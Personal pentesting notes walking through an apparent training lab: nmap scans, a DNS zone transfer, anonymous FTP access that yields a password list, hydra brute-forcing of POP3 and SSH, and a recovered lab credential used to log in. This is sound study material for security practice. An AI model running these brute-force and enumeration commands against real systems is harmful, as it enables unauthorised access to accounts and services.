Monty's Pentesting Notes | Obsidian

    Acs Medium Lab

    Context:

    • internal server
    • inlanefreight.htb domain
    • manages and stores emails and files
    • and serves as a backup of some of the company's processes
    • used relatively rarely
    • only been used for testing purposes

    nmap:
    scan all ports because there's a non-standard port open

    PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain   ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: USER UIDL TOP CAPA STLS PIPELINING SASL(PLAIN) AUTH-RESP-CODE RESP-CODES
995/tcp open  ssl/pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL(PLAIN) USER PIPELINING RESP-CODES TOP AUTH-RESP-CODE CAPA UIDL
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-04-11T16:38:55
|_Not valid after:  2032-04-08T16:38:55
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    This is a Linux Ubuntu Machine. Running SSH, DNS Domain Services, POP3, SSL/POP3
    I had to restart the machines to see the non-standard ports

    2121/tcp  open  ftp
30021/tcp open  ftp

    PORT      STATE SERVICE      VERSION
2121/tcp  open  ccproxy-ftp?
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (InlaneFTP) [10.129.180.139]
|     Invalid command: try being more creative
30021/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Internal FTP) [10.129.180.139]
|     Invalid command: try being more creative

    Brute-forcing POP3

    hydra -L users.list -P pws.list -f 10.129.56.161 pop3

    failed

    Attempt Zone Transfer #DNS #zone_transfer

    dig axfr inlanefreight.htb @10.129.56.161

    inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb.      604800  IN      NS      ns.inlanefreight.htb.
app.inlanefreight.htb.  604800  IN      A       10.129.200.5
dc1.inlanefreight.htb.  604800  IN      A       10.129.100.10
dc2.inlanefreight.htb.  604800  IN      A       10.129.200.10
int-ftp.inlanefreight.htb. 604800 IN    A       127.0.0.1
int-nfs.inlanefreight.htb. 604800 IN    A       10.129.200.70
ns.inlanefreight.htb.   604800  IN      A       127.0.0.1
un.inlanefreight.htb.   604800  IN      A       10.129.200.142
ws1.inlanefreight.htb.  604800  IN      A       10.129.200.101
ws2.inlanefreight.htb.  604800  IN      A       10.129.200.102
wsus.inlanefreight.htb. 604800  IN      A       10.129.200.80
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 76 msec
;; SERVER: 10.129.56.161#53(10.129.56.161) (TCP)
;; WHEN: Sat Jan 11 07:22:41 EST 2025
;; XFR size: 13 records (messages 1, bytes 372)

    I can see that it's an internal FTP, and an internal NFS. and there's root.inlanefreight.htb

    Attempting anonymous FTP
    #default_credentials #FTP

    ftp 10.129.180.139 30021

    worked.
    the directory is called simon, which probably is the username
    Also Got a text file

    └─$ cat mynotes.txt      
234987123948729384293
+23358093845098
ThatsMyBigDog
Rock!ng#May
Puuuuuh7823328
8Ns8j1b!23hs4921smHzwn
237oHs71ohls18H127!!9skaP
238u1xjn1923nZGSb261Bs81

    maybe this is a list of passwords?
    #cleartext_credentials

    brute-forcing ssh
    #brute_forcing_SSH

    hydra -l simon -P mypwd.list ssh://10.129.180.139

    Got credentials
    simon:8Ns8j1b!23hs4921smHzwn

    ssh into target and got the flag.